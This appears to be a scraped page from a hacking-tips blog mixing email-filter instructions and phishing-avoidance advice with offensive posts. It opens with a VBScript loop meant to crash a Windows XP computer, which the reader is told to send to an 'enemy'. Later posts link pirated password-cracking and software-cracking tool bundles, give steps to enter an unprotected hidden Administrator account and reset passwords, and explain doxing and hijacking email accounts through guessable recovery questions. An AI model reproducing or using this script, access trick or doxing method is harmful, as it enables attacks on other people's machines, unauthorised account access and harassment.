banner

Crash your enemy computer




USE THIS ON YOUR OWN RESPONSIBILITY
This Will Crash Your enemy Computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next


copy the above code,
open notepad,
paste the code,

Save It As Anything.vbs and send it to your enemy.never double-click this file..
It Only Works With Windows XP

How to Block Unwanted Emails



Do you want to  block emails from your ex wife/husband? Do you want to block those annoying offers and newsletters that reach your inbox? Well here is a way to block all those unwanted and annoying emails that you do not want to see or read! With this trick you can block individual email address or the whole domain from which you do not want the emails to come from. Here are the step-by-step instructions to do this.

For Gmail


1. Login to your account
2. At the top-right corner, click on Settings
3. Under Settings, click on Filters
4. You’ll now see an option “Create a new filter“, click on it
5. Now in the From field enter the email address from which you do not want to receive the emails
For ex. you may enter ashu@gmail.com in the From field to block all incoming emails from this address. However if you want to block the whole domain then use the following syntax: *@xyz.com. Now all the incoming emails from the domain xyz.com will be blocked.
6. Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. To unblock the email, all you need to do is just delete the filter that you’ve created.

For Yahoo


1. Login to your account
2. At the top-right corner, click on Options
3. A drop down menu appears, now click on More options
4. In the left panel select the option Filters and click on create or edit filters
5. Now click on Add
6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.
Fox ex. ashu@gmail.com or if you want to block an entire domain then just enter @xyz.com. Dont enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.

For Hotmail


1. Login to your account
2. At the top-right corner, click on Options
3. A drop down menu appears, now click on More options
4. Click on Safe and blocked senders link under Junk e-mail
5. Now click on Blocked senders
6. Type in the email address that you want to block under blocked e-mail address or domain field.
For ex. Enter ashu@yahoo.com to block the individual email address or just enter xyz.com to block the entire domain.
That’s it. You no longer receive those annoying emails in your inbox. Keep your inbox clean and tidy. I hope this post helps. pass your comments!

Cracking tools 2


Well, You may find a lot of posts in this site regarding various software cracking methods and might have learnt as well with the help of many cracking tutorials in which cracking was explained step by step.
But this thing is that even after you learn, you cannot implement it until and unless you do not have the required tools. So here comes a collection of good tools required for various methods of cracking. All tools are free to use. use them only for educational purpose. For any misuse you yourself will be 100% responsible.

Download link: http://rapidshare.com/files/344632864/tools.rar


enjoy!!

Collection of Password Hacking Tools 2011

Here I am sharing with you my latest collection of "Password Hacking Tools 2011". Using this password hacking kit you will be able to crack a lot of passwords like Windows Admin password, pdf passwords, zip files passwords, document passwords, rar passwords and much more.. I am sure you will find this collection useful.


 


This Password Hacking Kit Consists of following Password Hacking Breaking Tools:
  1. PDF Password Remover
  2. Windows XP Admin Password Remover
  3. Zip File Password Cracker.
  4. SQL Password Remover
  5. Microsoft Office Password Remover.
  6. Microsoft Windows Vista Password Remover.
  7. Rar File Password Cracker
  8. Windows Password Recovery Kit
  9. Password Changer.
  10. Distributed File Password Recovery..
and much more..

As the name of the tools suggests its a complete password hacking Kit. So guys Enjoy Latest Hacking tools...

How to Use it?

1. Download the Password Hacking
2. Extract the file and install it.
3. Then Register them and use it. ( all tools contain full serial keys and patches)

Do you have questions, comments, or suggestions? Feel free to post a comment!

Hacking the admin account

 Simply Accessing the Unprotected Admin or Administrator account.

How this hack works ? When we install windows XP on our system we usually rename the username as our name or some other keyword. But windows always creates the administrator account whenever we set up windows XP. So when you create your user account during install , windows creates two accounts that is one is your username account and other is Administrator account. But the main thing is that you will only see the account with your username and the Administrator account is hidden but its there and you can easily access that using the following steps:
Step1: Start your computer.
Step2: Now let it start until the windows user's username appears as shown in snapshot below...





Step3: As This Window Appears Press Ctrl+Alt +Delete (2 times).. Now the Windows like shown below appears..

 
Step4: Now as shown above Enter the Administrator on the Username box and press enter... Now you will be login in the admin account can easily rest the password...

For Resetting password you can follow two Procedures..
Procedure 1: Goto Start --> Control Panel --> User Accounts.. Now select the account whose password u want to reset.
Procedure 2 : Follow the Next method i.e hacking password through Net User Command.

Note: Hack 1 will only work if Administrator(default) is unsecure.


Enjoy!!!

What Is Doxing? - Doxing And It's Uses

First, let me explain what Doxing is. Doxing is the process of gaining information about someone or something by using sources on the Internet and using basic deduction skills. Its name is derived from “Documents” and in short it is the retrieval of “Documents” on a person or company.


You’re probably thinking, “Okay, so basically it’s getting information from searching someone’s email on Google right?” in a sense yes, but there are actually easier ways to get someone’s information online. The most popular and most common method is to use a website called Pipl (http://www.pipl.com/). Pipl allows you to search for full names, emails, usernames, and even phone numbers, thus making it a very useful tool for hackers. Another source hackers can use is Facebook (http://www.facebook.com). Sure, Facebook allows full name searches, but most hackers aren’t using it for its name search; they’re using it for its email search.


The main goal when Doxing is to find the target’s email (if you don’t have it). Your email is essentially your passport online; you sign up for websites using it, you have personal information on it, and if someone has access to it, they can essentially pretend to be you online. Once the hacker has the email, all he has to do is put it into Facebook or Pipl and he will be able to find you, assuming the email he has is connected to some account you have online. On the flipside of this, in order to find your email, the hacker either has to guess your email, befriend you on Facebook,or, hack one of your vulnerable friends and view your email that way. Once he’s done that, you’re in trouble.


Now, you’re probably thinking, “How’s he going to hack me with just my email?” well, that’s where Doxing comes in handy. If he can view your Facebook account, or he can find some other bit of information about you using Pipl, he can do what’s called reverting. Reverting is the process of using the target’s email’s recovery questions to gain access to the target’s email. Now, you may be thinking, “How’s he gonna guess my recovery question answers?” well, take a second look at your recovery questions and ask yourself, “Can someone find this answer online?” If you answered yes, then you’re vulnerable to reverting.
Any hacker reading this, that didn't previously know about reverting, would probably look at this and say

This would never work!” but you have to remember… we’re all humans, and we all make mistakes. Surprisingly, this method works more often than you’d think, but it is not for anyone who is lazy. Doxers tend to spend a while searching around the web for information that they can use.


Chances are, you’ve made some mistakes online, and if a skilled Doxer finds that mistake, then you’re in trouble. The Doxing method is based purely on the ability of the hacker to recognize valuable information about his target and use this information to his benefit. It is also based around the idea that, “The more you know about your target, the easier it will be to find his or her flaws.”

How can you insure that you won’t be Doxed? Well, as the Internet becomes more and more useful and addicting, it will become harder to not get Doxed. The main issue for most victims is their security questions, and their password security. If a victim has a very easy-to-find recovery question, then the victim will be easily reverted within a matter of seconds. Also, if the victim has a simple password, it could get brute forced simply by using a wordlist that applies to the victim’s interests, likes, and fancies (of course, this method is not as popular).


So, the main rule to not getting hacked is: Have secure passwords, and almost impossible to guess recovery questions. The main rule to not getting Doxed is… to just stay off the Internet; but, who wants to do that?
.

5 Steps To Avoid Email Phishing Attempts



When it comes to the issue of security on the internet, many internet users at times to take much time to care about this, they think that it is not that important but forget to realize that without the knowledge internet security measures, they can be a victim of internet fraud sooner or later.
Email phishing is an act of stealing internet user’s contents (valuable data such as band information, website logging details, your email username and password and some other confidential information like that). This act has turned many people into something else, some have lost properties, business assets and many other valuable things to online phishing attack due to ignorance of the system. If you know how to protect yourself online from this type of wicked people, it will be very easy for you to live your life as you supposed to live it than someone else to tell you how to live it.

Look At the Title of the Message Very Carefully

If you are type of person who regularly receive series of autoresponder messages from some services that you have subscribed to online, you will be able to know if a particular email is fraudulent or if it is legitimate to trust.
The way the autoresponder email series are programmed works well in helping you to know the type of person that is sending it and thereby also making you to have good relationship with the publisher but, also be careful that some of the phishers out-here are cunning in most of the times, they (hackers) too can craft an email in such a way that it will look just the same way like that of a legitimate company that is sending you regular mail on periodic basis.

Compare It With Other Related Title

Another thing that you can do to identify a phishing attempts from the normal email address from a legitimate group or company is by comparing the title of the message with other message that you have received from the company before, though, this also can look somehow confusing because they (phishers)can also make the headline look just the same way that the trusted company or individual usually sent to you. But, one thing that is very certain here is that there will be a difference between the two because the phishers doesn’t know that you are receiving mail from the person and another point is that he’s just trying to have access to your email in order to get more details about you.
So, with this it is very easy to identify them because there type of email will not go straight to the point as the person used to send you message but there’s will be a request, telling you to do this and that and from this you can be able to know if they are truly a genuine company or not.

Email Address Filtering –Identify Real Email Address of the sender

By scanning through the header of the email that this type of people sent to you will help you in knowing fully if the email is a fake or a genuine one. Getting the real address of the person who is sending you an email is another method you can use in knowing either if the person is a legit or not. Check the header of the email if the mail is in HTML format and you will be able to see the true identity of the sender whom sent you the message.

Check The Link Claimed That It Points To The Main Domain Name

You must take this precaution in order to stay save online, before you make any click on emails that you are not quite sure about, you have to hover your mouse on the link for about a second so that you ca be able to see the real link of the website.
The real identity of the website that was embedded in the email will be showed in your web browser status bar immediately you put the mouse on the link, not to click but to hover and look at the status bar. If you notice that the domain name in the link is mis-match, you must know that someone is trying to force you to submit your data in order to hack you thereafter and this can make you loose more information than you can ever think of.

Use Spam Filtering Software

If you are not quite sure of other ways to go, you can make use of spam filtering softwares that can help you block any forms of emails that looks like spam. Though, nowadays some mail client like gmail and yahoomail are now offering this services but it has limits but if you can as well help yourself by getting a spam-filtering software installed on your personal computer, you may not be able to view much of spamming emails in your inbox talk less of you opening it. You can get one email spam filtering software here by downloading the latest version of the Kapersky internet security 2012 or you can also download it from our official download page directly here and then install it on your computer for better security.
banner